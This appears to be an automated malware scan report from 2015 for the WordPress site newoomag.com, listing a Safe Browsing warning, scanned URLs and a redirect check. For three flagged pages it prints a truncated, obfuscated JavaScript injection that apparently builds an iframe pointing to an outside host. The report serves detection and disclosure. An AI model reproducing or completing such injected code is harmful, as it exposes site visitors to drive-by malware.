Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=newoomag.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.newoomag.com/ | 200 OK Content-Length: 12164 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ps="split";e=eval;v="0x";a=0;z="y";try{a*=25}catch(zz){a=1}if(!a){try{--e("doc"+"ument")["bod"+z]}catch(q){a2="_";sa=0xa-02;}z="28_6e_7d_76_6b_7c_71_77_76_28_82_82_82_6e_6e_6e_30_31_28_83_15_12_28_7e_69_7a_28_75_79_69_75_28_45_28_6c_77_6b_7d_75_6d_76_7c_36_6b_7a_6d_69_7c_6d_4d_74_6d_75_6d_76_7c_30_2f_71_6e_7a_69_75_6d_2f_31_43_15_12_15_12_28_75_79_69_75_36_7b_7a_6b_28_45_28_2f_70_7c_7c_78_42_37_37_7c_7d_7a_6a_77_74_71_76_73_7b_36_77_7a_6f_6e_7a_6d_6d_36_6b_77_75_37_6c_77_6b_7d_75_6d_76_7c_69_7c_ Antivirus reports:
| ||
http://www.newoomag.com/wp-admin/ | HTTP/1.1 302 Found Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Thu, 29 Jan 2015 08:02:06 GMT Pragma: no-cache Location: http://www.newoomag.com/wp-login.php?redirect_to=http%3A%2F%2Fwww.newoomag.com%2Fwp-admin%2F&reauth=1 Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html Expires: Wed, 11 Jan 1984 05:00:00 GMT X-Powered-By: PHP/5.4.4-14+deb7u11 | clean |
http://www.newoomag.com/wp-login.php?redirect_to=http%3a%2f%2fwww.newoomag.com%2fwp-admin%2f&reauth=1 | 200 OK Content-Length: 2267 Content-Type: text/html | clean |
http://www.newoomag.com/wp-login.php?action=lostpassword | 200 OK Content-Length: 1911 Content-Type: text/html | clean |
http://www.newoomag.com/wp-login.php | 200 OK Content-Length: 2267 Content-Type: text/html | clean |
http://www.newoomag.com/test404page.js | 404 Not Found Content-Length: 244 Content-Type: text/html | clean |
http://www.newoomag.com/?feed=rss2 | 200 OK Content-Length: 9828 Content-Type: text/xml | malicious |
Malicious code - confirmed by antiviruses (see below) ps="split";e=eval;v="0x";a=0;z="y";try{a*=25}catch(zz){a=1}if(!a){try{--e("doc"+"ument")["bod"+z]}catch(q){a2="_";sa=0xa-02;}z="28_6e_7d_76_6b_7c_71_77_76_28_82_82_82_6e_6e_6e_30_31_28_83_15_12_28_7e_69_7a_28_75_79_69_75_28_45_28_6c_77_6b_7d_75_6d_76_7c_36_6b_7a_6d_69_7c_6d_4d_74_6d_75_6d_76_7c_30_2f_71_6e_7a_69_75_6d_2f_31_43_15_12_15_12_28_75_79_69_75_36_7b_7a_6b_28_45_28_2f_70_7c_7c_78_42_37_37_7c_7d_7a_6a_77_74_71_76_73_7b_36_77_7a_6f_6e_7a_6d_6d_36_6b_77_75_37_6c_77_6b_7d_75_6d_76_7c_69_7c_ Antivirus reports:
| ||
http://www.newoomag.com/?attachment_id=5 | 200 OK Content-Length: 12400 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ps="split";e=eval;v="0x";a=0;z="y";try{a*=25}catch(zz){a=1}if(!a){try{--e("doc"+"ument")["bod"+z]}catch(q){a2="_";sa=0xa-02;}z="28_6e_7d_76_6b_7c_71_77_76_28_82_82_82_6e_6e_6e_30_31_28_83_15_12_28_7e_69_7a_28_75_79_69_75_28_45_28_6c_77_6b_7d_75_6d_76_7c_36_6b_7a_6d_69_7c_6d_4d_74_6d_75_6d_76_7c_30_2f_71_6e_7a_69_75_6d_2f_31_43_15_12_15_12_28_75_79_69_75_36_7b_7a_6b_28_45_28_2f_70_7c_7c_78_42_37_37_7c_7d_7a_6a_77_74_71_76_73_7b_36_77_7a_6f_6e_7a_6d_6d_36_6b_77_75_37_6c_77_6b_7d_75_6d_76_7c_69_7c_ Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: newoomag.com
Result:
GET / HTTP/1.1
Host: newoomag.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: newoomag.com
Referer: http://www.google.com/search?q=newoomag.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: newoomag.com
Referer: http://www.google.com/search?q=newoomag.com
Result:
The result is similar to the first query. There are no suspicious redirects found.